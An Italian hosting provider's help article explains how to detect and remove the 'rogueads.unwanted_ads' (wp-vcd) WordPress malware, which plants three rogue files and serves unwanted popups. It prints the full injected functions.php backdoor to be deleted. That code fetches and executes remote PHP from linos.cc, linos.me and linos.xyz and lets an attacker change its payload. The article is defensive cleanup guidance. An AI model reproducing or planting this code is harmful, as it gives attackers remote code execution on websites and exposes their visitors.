skip to Main Content
Il Tuo Sito WordPress è Stato Infettato Dal Malware Rogueads.unwanted_ads?

Il tuo sito WordPress è stato infettato dal malware rogueads.unwanted_ads?

Il tuo sito web WordPress è stato infettato dal malware rogueads.unwanted_ads?

Il Malware Rogueads.unwanted_ads è classificato di medio/alto rischio riuscendo ad infettare l’intero sito web, siccome riesce a scrivere il codice malevolo nei file che vengono richiamati da tutte le pagine web.

Prima di tutto bisogna specificare il significato di Malware e poi capire l’entità del malware rogueads.unwanted_ads.

Il malware non sempre crea danni tangibili ad un sito web o un sistema informatico, ma va interpretato come un programma che di nascosto ruba informazioni di vario genere, senza che l’utente ne venga a conoscenza per lunghi periodi di tempo. Oltre a questo scopo un Malware può avere anche un’altra destinazione, che è quella di arrecare danni ad un sistema informatico criptando i dati del computer della vittima, chiedendo poi del denaro per la decriptazione.

Malware è una definizione generica del problema, un malware può essere un software malevolo, Virus, Worm, Trojan, Ransomware, Spyware, Adware, Scareware e tanti altri ancora…

Il Malware si presenta anche in diverse forme come ad esempio uno Script o un Codice eseguibile. Nel caso di siti web realizzati con WordPress il malware si presenta sotto forma di script PHP e Javascript che vengono iniettati nei files più importanti di questo CMS.

Come si evolve un malware rogueads.unwanted_ads?

Il malware rogueads.unwanted_ads attaccano un sito web inserendo un codice malevolo nei file dello stesso, andando a modificare il file header.php del tema in uso su WordPress, oppure come nel caso di questo malware infetta file essenziali di WordPress per poi estendersi un tutte le pagine del sito. Il cliente può accorgersi dell’avvenuta violazione tramite la comparsa random di popup o popup under pubblicitari non appena si apre un link del sito web, ovviamente questi popup vengono mostrati senza il consenso dell’amministratore dello spazio web. Non sempre i link a cui rimanda questo Malware sono pericolosi, infatti posso essere dei normali annunci pubblicitari ma in altri casi reindirizzano a pagine web dannosi che mirano ad effettuare altri tipi di contagi per il visitatore.

Per questo motivo la sicurezza del proprio spazio web ricopre un ruolo importante sia per gli amministratori, sia per coloro che fanno visita al nostro sito web.

Come ci accorgiamo se il sito web in WordPress è infettato da malware rogueads.unwanted_ads?

Il modo più semplice per capire che il nostro WordPress è stato contagiato resta l’esecuzione di popup pubblicitari non consentiti al click su un qualsiasi link del nostro sito web.

Il nostro consiglio è quello di effettuare una scansione dello spazio web WordPress, tramite le applicazioni che troverete nel vostro pannello di controllo oppure utilizzare uno dei tanti prodotti online.

Un’altro elemento per capire che il nostro sito web è stato infettato è la presenza di tre files nella cartella WP-INCLUDE di WordPress, che sono :

  • wp-feed.php
  • wp-tmp.php
  • wp-vcd.php

Questi files non appartengono a WordPress, ma vengono generati dal Malware quindi se vi ritrovate questi tre files nell’istanza di WordPress siete stati contagiati dal: malware Rogueads.unwanted_ads.

Com’è possibile rimuovere il malware rogueads.unwanted_ads?

I nostri clienti possono rimuovere questo tipo di Malware utilizzando gli strumenti presenti nel proprio pannello di hosting. Ma se questo non funziona e possibile rimuovere il Malware in modo manuale.

Questo tipo di Malware punta ad infettare i file del tema attivo per il nostro sito web. Quindi tramite il File Manager del pannello di controllo troviamo è apriamo il file “functions.php” della nostra istanza di WordPress. Il file infettato avrà come inizio il seguente codice che va rimosso:

<?php

if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ’39d03addc3c0d7469864410d072b3d86′))

{

$div_code_name=”wp_vcd”;

switch ($_REQUEST[‘action’])

{

case ‘change_domain’;

if (isset($_REQUEST[‘newdomain’]))

{

if (!empty($_REQUEST[‘newdomain’]))

{

if ($file = @file_get_contents(__FILE__))

{

if(preg_match_all(‘/\$tmpcontent = @file_get_contents\(“http:\/\/(.*)\/code\.php/i’,$file,$matcholddomain))

{

$file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file);

@file_put_contents(__FILE__, $file);

print “true”;

}

}

}

}

break;

case ‘change_code’;

if (isset($_REQUEST[‘newcode’]))

{

if (!empty($_REQUEST[‘newcode’]))

{

if ($file = @file_get_contents(__FILE__))

{

if(preg_match_all(‘/\/\/\$start_wp_theme_tmp([\s\S]*)\/\

/\$end_wp_theme_tmp/i’,$file,$matcholdcode))

{

$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST[‘newcode’]), $file);

@file_put_contents(__FILE__, $file);

print “true”;

}

}

}

}

break;

default: print “ERROR_WP_ACTION WP_V_CD WP_CD”;

}

die(“”);

}

$div_code_name = “wp_vcd”;

$funcfile      = __FILE__;

if(!function_exists(‘theme_temp_setup’)) {

$path = $_SERVER[‘HTTP_HOST’] . $_SERVER[REQUEST_URI];

if (stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {

 

function file_get_contents_tcurl($url)

{

$ch = curl_init();

curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);

curl_setopt($ch, CURLOPT_HEADER, 0);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);

$data = curl_exec($ch);

curl_close($ch);

return $data;

}

 

function theme_temp_setup($phpCode)

{

$tmpfname = tempnam(sys_get_temp_dir(), “theme_temp_setup”);

$handle   = fopen($tmpfname, “w+”);

if( fwrite($handle, “<?php\n” . $phpCode))

{

}

else

{

$tmpfname = tempnam(‘./’, “theme_temp_setup”);

$handle   = fopen($tmpfname, “w+”);

fwrite($handle, “<?php\n” . $phpCode);

}

fclose($handle);

include $tmpfname;

unlink($tmpfname);

return get_defined_vars();

}

 

$wp_auth_key=’7af507a87318d795efbdb0a3a9028aad’;

if (($tmpcontent = @file_get_contents(“http://www.linos.cc/code.php”) OR $tmpcontent = @file_get_contents_tcurl(“http://www.linos.cc/code.php”)) AND stripos($tmpcontent, $wp_auth_key) !== false) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {

extract(theme_temp_setup($tmpcontent));

@file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);

 

if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {

@file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);

if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {

@file_put_contents(‘wp-tmp.php’, $tmpcontent);

}

}

 

}

}

 

elseif ($tmpcontent = @file_get_contents(“http://www.linos.me/code.php”)  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {

extract(theme_temp_setup($tmpcontent));

@file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);

 

if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {

@file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);

if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {

@file_put_contents(‘wp-tmp.php’, $tmpcontent);

}

}

}

} elseif ($tmpcontent = @file_get_contents(ABSPATH . ‘wp-includes/wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {

extract(theme_temp_setup($tmpcontent));

 

} elseif ($tmpcontent = @file_get_contents(get_template_directory() . ‘/wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {

extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents(‘wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {

extract(theme_temp_setup($tmpcontent));

} elseif (($tmpcontent = @file_get_contents(“http://www.linos.xyz/code.php”) OR $tmpcontent = @file_get_contents_tcurl(“http://www.linos.xyz/code.php”)) AND stripos($tmpcontent, $wp_auth_key) !== false) {

extract(theme_temp_setup($tmpcontent));

}

 

}

}

//$start_wp_theme_tmp

//wp_tmp

//$end_wp_theme_tmp

?>

Una volta eliminato questo codice dal nostro file ” functions.php ” procediamo con l’eliminazione dei tre file creati dal Malware nella cartella ” wp-include ” che sono :

  • wp-feed.php
  • wp-tmp.php
  • wp-vcd.php

Se questo procedimento non funziona consigliamo di eliminare l’instanza di WordPress dal proprio spazio web e ripristinare il tutto con un backup pulito. Per qualsiasi problematica i nostri clienti possono aprire un Ticket dall’area clienti e segnalare il problema in modo tale da ricevere assistenza dai nostri tecnici.